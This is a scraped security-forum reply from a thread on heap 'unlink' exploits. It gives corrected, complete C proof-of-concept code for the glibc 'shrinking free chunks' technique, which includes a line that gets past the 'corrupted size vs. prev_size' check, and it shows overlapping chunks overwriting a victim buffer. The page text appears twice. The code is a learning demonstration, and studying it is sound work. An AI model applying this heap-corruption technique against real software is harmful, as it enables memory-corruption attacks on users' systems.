Unlink Exploit 笔记-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

最新回复 (1)
jmpcall 雪币： 3344 活跃值： (10982) 能力值： ( LV9，RANK：240 ) 在线值：发帖 35 回帖 223 粉丝 52 关注私信	jmpcall 3 2 楼原文：Shrinking Free Chunks 这篇帖子中的代码有问题，需要添加一行代码： (size_t)(b + 0x200 - sizeof(size_t)2) = 0x200; 完整代码： #include <stdio.h> #include <stdlib.h> #include <string.h> struct chunk_structure { size_t prev_size; size_t size; struct chunk_structure fd; struct chunk_structure bk; char buf[19]; // padding }; int main() { void a, b, c, b1, b2, big; struct chunk_structure b_chunk, c_chunk; // Grab three consecutive chunks in memory a = malloc(0x100); // at 0xfee010 b = malloc(0x200); // at 0xfee120 c = malloc(0x100); // at 0xfee330 b_chunk = (struct chunk_structure )(b - 2sizeof(size_t)); c_chunk = (struct chunk_structure )(c - 2sizeof(size_t)); // 避免编译时产生告警 (void)a; (void)c_chunk; // free b, now there is a large gap between 'a' and 'c' in memory // b will end up in unsorted bin free(b); // Attacker overflows 'a' and overwrites least significant byte of b's size // with 0x00. This will decrease b's size. (char )&b_chunk->size = 0x00; // 避免malloc()检查异常：corrupted size vs. prev_size (size_t)(b + 0x200 - sizeof(size_t)2) = 0x200; //(((size_t)c_chunk)-2) = 0x200; // Allocate another chunk // 'b' will be used to service this chunk. // c's previous size will not updated. In fact, the update will be done a few // bytes before c's previous size as b's size has decreased. // So, b + b->size is behind c. // c will assume that the previous chunk (c - c->prev_size = b/b1) is free b1 = malloc(0x80); // at 0xfee120 // Allocate another chunk // This will come directly after b1 b2 = malloc(0x80); // at 0xfee1b0 strcpy(b2, "victim's data"); // Free b1 free(b1); // Free c // This will now consolidate with b/b1 thereby merging b2 within it // This is because c's prev_in_use bit is still 0 and its previous size // points to b/b1 free(c); // Allocate a big chunk to cover b2's memory as well big = malloc(0x200); // at 0xfee120 memset(big, 0x41, 0x200 - 1); printf("%s\n", (char *)b2); // Prints AAAAAAAAAAA... ! return 0; } 2020-5-9 10:15 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (1)

jmpcall

雪币： 3344

活跃值： (10982)

能力值：

( LV9，RANK：240 )

在线值：

发帖

回帖

223

粉丝

关注

私信

jmpcall 3: 2 楼

原文：Shrinking Free Chunks

这篇帖子中的代码有问题，需要添加一行代码：

*(size_t*)(b + 0x200 - sizeof(size_t)*2) = 0x200;

完整代码：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct chunk_structure {
  size_t prev_size;
  size_t size;
  struct chunk_structure *fd;
  struct chunk_structure *bk;
  char buf[19];               // padding
};

int main()
{
  void *a, *b, *c, *b1, *b2, *big;
  struct chunk_structure *b_chunk, *c_chunk;

  // Grab three consecutive chunks in memory
  a = malloc(0x100);                            // at 0xfee010
  b = malloc(0x200);                            // at 0xfee120
  c = malloc(0x100);                            // at 0xfee330

  b_chunk = (struct chunk_structure *)(b - 2*sizeof(size_t));
  c_chunk = (struct chunk_structure *)(c - 2*sizeof(size_t));

  // 避免编译时产生告警
  (void)a;
  (void)c_chunk;

  // free b, now there is a large gap between 'a' and 'c' in memory
  // b will end up in unsorted bin
  free(b);

  // Attacker overflows 'a' and overwrites least significant byte of b's size
  // with 0x00. This will decrease b's size.
  *(char *)&b_chunk->size = 0x00;

  // 避免malloc()检查异常：corrupted size vs. prev_size
  *(size_t*)(b + 0x200 - sizeof(size_t)*2) = 0x200;
  //*(((size_t*)c_chunk)-2) = 0x200;

  // Allocate another chunk
  // 'b' will be used to service this chunk.
  // c's previous size will not updated. In fact, the update will be done a few
  // bytes before c's previous size as b's size has decreased.
  // So, b + b->size is behind c.
  // c will assume that the previous chunk (c - c->prev_size = b/b1) is free
  b1 = malloc(0x80);                           // at 0xfee120

  // Allocate another chunk
  // This will come directly after b1
  b2 = malloc(0x80);                           // at 0xfee1b0
  strcpy(b2, "victim's data");

  // Free b1
  free(b1);

  // Free c
  // This will now consolidate with b/b1 thereby merging b2 within it
  // This is because c's prev_in_use bit is still 0 and its previous size
  // points to b/b1
  free(c);

  // Allocate a big chunk to cover b2's memory as well
  big = malloc(0x200);                          // at 0xfee120
  memset(big, 0x41, 0x200 - 1);

  printf("%s\n", (char *)b2);       // Prints AAAAAAAAAAA... !
  return 0;
}

2020-5-9 10:15